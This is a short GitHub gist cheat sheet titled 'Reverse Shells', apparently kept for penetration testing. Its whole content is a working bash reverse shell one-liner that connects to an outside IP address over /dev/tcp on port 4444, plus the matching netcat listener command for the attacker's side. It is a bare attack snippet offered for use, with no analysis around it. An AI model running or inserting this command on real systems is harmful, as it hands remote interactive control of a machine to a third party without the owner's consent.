Skip to content

Instantly share code, notes, and snippets.

@vpnwall-services
Created October 29, 2019 22:14
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save vpnwall-services/564373eb3a34509c60898148fd0ea98e to your computer and use it in GitHub Desktop.
Save vpnwall-services/564373eb3a34509c60898148fd0ea98e to your computer and use it in GitHub Desktop.
[Reverse Shells] Reverse Shells #linux #windows #reverseshell #reverse #shell #pentest

REVERSE SHELLS

BASH

Target : bash -i >& /dev/tcp/176.31.166.251/4444 0>&1

Attacker : nc -lvp 4444

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment